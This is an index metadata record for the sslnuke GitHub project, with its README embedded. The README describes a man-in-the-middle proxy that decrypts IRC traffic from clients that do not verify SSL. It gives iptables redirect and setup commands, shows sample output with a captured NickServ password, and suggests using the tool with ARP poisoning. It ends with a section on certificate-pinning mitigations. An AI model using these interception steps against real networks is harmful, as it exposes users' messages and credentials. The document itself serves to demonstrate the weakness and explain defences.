{"id":13775779,"url":"https://github.com/jtripper/sslnuke","last_synced_at":"2025-05-11T08:33:20.724Z","repository":{"id":10525455,"uuid":"12716622","full_name":"jtripper/sslnuke","owner":"jtripper","description":"Transparent proxy that decrypts SSL traffic and prints out IRC messages.","archived":false,"fork":false,"pushed_at":"2013-09-10T21:04:01.000Z","size":140,"stargazers_count":77,"open_issues_count":0,"forks_count":12,"subscribers_count":8,"default_branch":"master","last_synced_at":"2024-11-17T10:40:19.218Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jtripper.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2013-09-10T00:53:02.000Z","updated_at":"2024-08-12T19:12:16.000Z","dependencies_parsed_at":"2022-08-30T17:12:10.215Z","dependency_job_id":null,"html_url":"https://github.com/jtripper/sslnuke","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jtripper%2Fsslnuke","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jtripper%2Fsslnuke/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jtripper%2Fsslnuke/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jtripper%2Fsslnuke/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jtripper","download_url":"https://codeload.github.com/jtripper/sslnuke/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253540328,"owners_count":21924521,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-03T17:01:49.527Z","updated_at":"2025-05-11T08:33:20.462Z","avatar_url":"https://github.com/jtripper.png","language":"C","funding_links":[],"categories":["\u003ca id=\"d03d494700077f6a65092985c06bf8e8\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"0ff94312f3ab4898f5996725133ea9d1\"\u003e\u003c/a\u003e未分类"],"readme":"# sslnuke -- SSL without verification isn't secure!\n--------------------------------------\n\nWe have all heard over and over that SSL without verification is not secure. \nIf an SSL connection is not verified with a cached certificate, it can easily be\nhijacked by any attacker. So in 2013, one would think we had totally done away with this\nproblem. Browsers cache certificates and very loudly warn the user when a site has\noffered up a self-verified certificate and should not be trusted, browser vendors have\npretty much solved this problem. However, HTTPS is not the only protocol that uses\nSSL. Unfortunately, many clients for these other protocols do not verify by default and even\nif they did, there is no guarantee of secure certificate transfer. After all, how many \npeople are willing to pay $50 for an SSL certificate for their FTPS server? \n\nA common protocol that uses SSL but is rarely verified is IRC. Many IRC clients\nverify by default, but most users will turn this off because IRC servers administrators\ntend not to purchase legitimate SSL certificates. Some popular clients even leave\nSSL verification off by default (IRSSI, for example). We already know that this is \nunwise, any attacker between a user and the IRC server can offer an invalid\ncertificate and decrypt all of the user's traffic (including possibly sensitive\nmessages). Most users don't even consider this fact when connecting to an\nSSL \"secured\" IRC server. \n\nThe purpose of sslnuke is to write a tool geared towards decrypting and intercepting\n\"secured\" IRC traffic. There are plenty of existing tools that intercept SSL traffic already,\nbut most of these are geared towards HTTP traffic. sslnuke targets IRC directly in order to \ndemonstrate how easy it is to intercept \"secured\" communications. sslnuke usage is simple.\n\n## Usage\n\nFirst, add a user account for sslnuke to run as and add iptables rules to redirect traffic\nto it:\n\n    # useradd -s /bin/bash -m sslnuke\n    # grep sslnuke /etc/passwd\n    sslnuke:x:1000:1000::/home/sslnuke:/bin/bash\n    # iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \\\n      --dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444\n\nFinally, login as sslnuke, build, and run sslnuke:\n\n    # su -l sslnuke\n    # cd sslnuke\n    # make\n    # ./sslnuke\n\nRun an IRC client and login to your favorite IRC network using SSL,\nIRC messages will be printed to stdout on sslnuke.\n\n    [*] Received connection from: 192.168.0.5:58007\n    [*] Opening connection to: 1.1.1.1:6697\n    [*] Connection Using SSL!\n    [*] irc.com -\u003e AUTH (1.1.1.1): *** Looking up your hostname...\n    [*] irc.com -\u003e AUTH (1.1.1.1): *** Found your hostname\n    [*] irc.com -\u003e victim (1.1.1.1): *** You are connected to irc.vps-heaven.com with TLSv1.2-AES256-GCM-SHA384-256bits\n    [*] 192.168.0.5 -\u003e nickserv (192.168.0.5): id hello\n    [*] NickServ!services@irc.com -\u003e victim (1.1.1.1): Password accepted - you are now recognized.\n\nsslnuke will automatically detect a client using SSL and determine whether or not\nto use SSL. The code could also be easily modified to show web site passwords or\nFTP data, anything using SSL. To attack users on a network, sslnuke can be used\nin conjunction with an ARP poisoning tool, such as the one found at [Blackhat Library](http://www.blackhatlibrary.net/Python#Scapy)\nor it can be deployed on a gateway.\n\nA video demonstration of sslnuke can be seen at [ascii.io](http://ascii.io/a/5370).\n\n## Mitigation\n\nNow on to the important part, how do we verify SSL connections? The first step is to\ntransfer the SSL certificate over an alternative medium, the best way would be to\nhave the administrator directly give you the certificate. However, if this is not possible,\nopenssl can download the certificate from the server:\n\n    # openssl s_client -showcerts -connect irc.com:6697 \u003c/dev/null\n\nSave the certificate into ~/.irssi/ssl/irc.com.crt. It is best to run the command from a \ncomputer on a different network than yours to prevent this from being intercepted. Next, to\nconfigure IRSSI to use the certificate, save a network:\n\n    /network add irc\n    /server add -ssl_cafile ~/.irssi/ssl/irc.com.crt -network irc -port 6697 irc.com\n\nIf IRSSI ever gets an invalid certificate, it will warn you and disconnect immediately. However,\nfor the truly paranoid, a Tor hidden service or VPN should be used. To configure automatic\nTor hidden service redirection on Linux one can run the following commands:\n\n    # echo \"VirtualAddrNetwork 10.192.0.0/10\" \u003e\u003e /etc/tor/torrc\n    # echo \"AutomapHostsOnResolve 1\" \u003e\u003e /etc/tor/torrc\n    # echo \"TransPort 9040\" \u003e\u003e /etc/tor/torrc\n    # echo \"DNSPort 5353\" \u003e\u003e /etc/tor/torrc\n    # killall -HUP tor\n    # iptables -t nat -A OUTPUT -p tcp -d 10.192.0.0/10 -j REDIRECT --to-ports 9040\n    # iptables -t nat -A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports 5353\n    # ncat xxxxxxxxxxxxxxx.onion 6667\n    :irc.com NOTICE AUTH :*** Looking up your hostname...\n    :irc.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead\n    ^C\n\nUltimately, IRC clients should use an SSH-style key verification. On first connect, present the\ncertificate fingerprint to the user and force the user to confirm it and then cache the certificate.\nIf it changes the next time, do not allow the connection.\n\n## Source\n\nThe source code can be downloaded on [Github](https://github.com/jtripper/sslnuke).\n\n## Credit\n\n* jtripper -- jack@jtripper.net\n* [Blackhat Library](http://blackhatlibrary.net/)\n* [Chokepoint](http://chokepoint.net)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjtripper%2Fsslnuke","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjtripper%2Fsslnuke","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjtripper%2Fsslnuke/lists"}